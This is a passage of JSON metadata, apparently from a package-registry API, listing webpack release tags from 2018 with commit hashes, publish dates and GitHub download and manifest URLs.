webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf